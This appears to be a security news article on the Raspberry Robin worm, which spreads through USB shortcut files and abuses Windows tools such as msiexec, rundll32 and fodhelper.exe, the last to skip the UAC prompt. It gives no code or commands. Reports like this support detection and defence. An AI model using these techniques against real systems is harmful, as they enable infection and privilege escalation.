A malware with worm-like capabilities is being used in attack campaigns affecting Windows systems. The threat and its associated cluster of activity have been tracked as the Raspberry Robin and 'QNAP worm' by cybersecurity researchers. According to their reports, the Raspberry Robin operation was noticed back in September 2021, but most of the activity took place in and after January 2022. Victims of the threat have been identified as companies operating in the technology and manufacturing sectors, but there could potentially be others as well. It should be noted that, so far, the goals of the threat actors have not been confirmed.
Exploiting Legitimate Windows Tools
The infection chain of the Raspberry Robin begins with infected removable drives such as USB devices. These drives contain the Raspberry Robin worm in the form of a shortcut .lnk file, disguised as a legitimate folder. The threat activates after the corrupted drive is connected to the computer. It takes advantage of cmd.exe to read and then execute a file found on the infected external drive. The researchers have found that this command is consistent between different Raspberry Robin detections, and can be used as an indicator of the threatening activities carried out by the worm.
As part of its actions, the malware takes extensive advantage of legitimate Windows utilities. It exploits msiexec.exe (Microsoft Standard Installer) to fetch and execute a compromised DLL file, alongside other legitimate installer packages. The DLL file is believed to have persistence-related functionality and is taken from a corrupted Command-and-Control (C2, C&C) domain, likely hosted on compromised QNAP devices. The outbound C2 activity attributed to Raspberry Robin also has been observed using the Windows processes regsvr32.exe, rundll32.exe and dllhost.exe. The external network connection attempts were aimed at IP addresses on TOR nodes.
The Raspberry Robin also forces msiexec.exe to launch another real Window utility - fodhelper.exe. The threat relies on it to spawn rundll32.exe and initiate a threatening command. The threat actor chose fodhelper.exe due to its ability to launch processes with elevated admin privileges, without triggering a User Account Control (UAC) prompt.